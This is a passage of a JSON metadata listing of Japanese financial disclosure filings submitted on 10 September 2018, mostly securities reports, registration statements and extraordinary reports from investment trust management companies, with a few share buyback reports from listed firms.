},
{
"seqNumber": 46,
"docID": "S100E2J3",
"edinetCode": "E06264",
"secCode": null,
"JCN": "6010001098507",
"filerName": "JPモルガン・アセット・マネジメント株式会社",
"fundCode": "G07438",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:09",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CI3D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 47,
"docID": "S100E2NJ",
"edinetCode": "E13000",
"secCode": null,
"JCN": "4010001069955",
"filerName": "フランクリン・テンプルトン・インベストメンツ株式会社",
"fundCode": "G08227",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:09",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CIXS",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 48,
"docID": "S100DYXY",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10551",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:09",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第8期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 49,
"docID": "S100E298",
"edinetCode": "E12434",
"secCode": null,
"JCN": "7010001031160",
"filerName": "損保ジャパン日本興亜アセットマネジメント株式会社",
"fundCode": "G12361",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:09",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 50,
"docID": "S100E05B",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G12037",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:10",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 51,
"docID": "S100DZSV",
"edinetCode": "E06433",
"secCode": null,
"JCN": "3010001034076",
"filerName": "東京海上アセットマネジメント株式会社",
"fundCode": "G10742",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:11",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第7期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 52,
"docID": "S100E1NK",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11945",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:11",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 53,
"docID": "S100DZJS",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10987",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:11",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 54,
"docID": "S100DYPU",
"edinetCode": "E12431",
"secCode": null,
"JCN": "3010001068479",
"filerName": "BNPパリバ・アセットマネジメント株式会社",
"fundCode": "G05226",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:11",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第23期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 55,
"docID": "S100E1VS",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G12760",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-11",
"periodEnd": "2018-12-14",
"submitDateTime": "2018-09-10 09:11",
"docDescription": "半期報告書(内国投資信託受益証券)-第1期(平成29年12月11日-平成30年12月14日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 56,
"docID": "S100DYYS",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G12597",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:12",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第2期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 57,
"docID": "S100DYXW",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10551",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:12",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 58,
"docID": "S100E00U",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01297",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:12",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第37期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 59,
"docID": "S100DZM3",
"edinetCode": "E10439",
"secCode": null,
"JCN": "4010001027269",
"filerName": "ピクテ投信投資顧問株式会社",
"fundCode": "G10159",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:12",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 60,
"docID": "S100E2RG",
"edinetCode": "E30689",
"secCode": null,
"JCN": "4010001158535",
"filerName": "あおぞら投信株式会社",
"fundCode": "G10831",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-12",
"periodEnd": "2018-12-10",
"submitDateTime": "2018-09-10 09:12",
"docDescription": "半期報告書(内国投資信託受益証券)-第4期(平成29年12月12日-平成30年12月10日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 61,
"docID": "S100E2OZ",
"edinetCode": "E02784",
"secCode": "99920",
"JCN": "6010501014707",
"filerName": "株式会社理研グリーン",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "043000",
"docTypeCode": "140",
"periodStart": "2018-05-01",
"periodEnd": "2018-07-31",
"submitDateTime": "2018-09-10 09:13",
"docDescription": "四半期報告書-第63期第3四半期(平成30年5月1日-平成30年7月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 62,
"docID": "S100DYYM",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G12597",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:14",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 63,
"docID": "S100E00V",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01297",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:14",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CFEN",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 64,
"docID": "S100DZM5",
"edinetCode": "E10439",
"secCode": null,
"JCN": "4010001027269",
"filerName": "ピクテ投信投資顧問株式会社",
"fundCode": "G10159",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-12",
"periodEnd": "2018-12-10",
"submitDateTime": "2018-09-10 09:14",
"docDescription": "半期報告書(内国投資信託受益証券)-第5期(平成29年12月12日-平成30年12月10日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 65,
"docID": "S100E2P4",
"edinetCode": "E02784",
"secCode": "99920",
"JCN": "6010501014707",
"filerName": "株式会社理研グリーン",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:14",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 66,
"docID": "S100DZQM",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G08824",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:14",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第12期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 67,
"docID": "S100DYY0",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10935",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:15",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第7期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 68,
"docID": "S100E1VP",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G12760",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:15",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100BLZT",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 69,
"docID": "S100E2FF",
"edinetCode": "E03867",
"secCode": "88180",
"JCN": "6120001078852",
"filerName": "京阪神ビルディング株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:16",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 70,
"docID": "S100DZQN",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G08824",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:16",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 71,
"docID": "S100DMAA",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11857",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:16",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第23期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 72,
"docID": "S100E2SA",
"edinetCode": "E04005",
"secCode": "89090",
"JCN": "3290001020676",
"filerName": "株式会社シノケングループ",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:16",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 73,
"docID": "S100E01O",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01295",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:17",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第37期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 74,
"docID": "S100DYXZ",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10935",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:17",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 75,
"docID": "S100DZYU",
"edinetCode": "E10439",
"secCode": null,
"JCN": "4010001027269",
"filerName": "ピクテ投信投資顧問株式会社",
"fundCode": "G03651",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:17",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第30期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 76,
"docID": "S100DYQ3",
"edinetCode": "E12431",
"secCode": null,
"JCN": "3010001068479",
"filerName": "BNPパリバ・アセットマネジメント株式会社",
"fundCode": "G05226",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:18",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CGD2",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 77,
"docID": "S100E01P",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01295",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:19",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CFDW",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 78,
"docID": "S100E2YI",
"edinetCode": "E01651",
"secCode": "63470",
"JCN": "6030001018165",
"filerName": "株式会社プラコー",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:19",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 79,
"docID": "S100DMA9",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11857",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:21",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 80,
"docID": "S100E29G",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G13127",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:21",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 81,
"docID": "S100E24N",
"edinetCode": "E12963",
"secCode": null,
"JCN": "2010401034817",
"filerName": "ステート・ストリート・グローバル・アドバイザーズ株式会社",
"fundCode": "G08488",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:22",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 82,
"docID": "S100E05Y",
"edinetCode": "E12566",
"secCode": null,
"JCN": "2010001066780",
"filerName": "イーストスプリング・インベストメンツ株式会社",
"fundCode": "G09277",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:22",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第10期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 83,
"docID": "S100E044",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01293",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:22",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第37期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 84,
"docID": "S100E2ST",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G03677",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:22",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
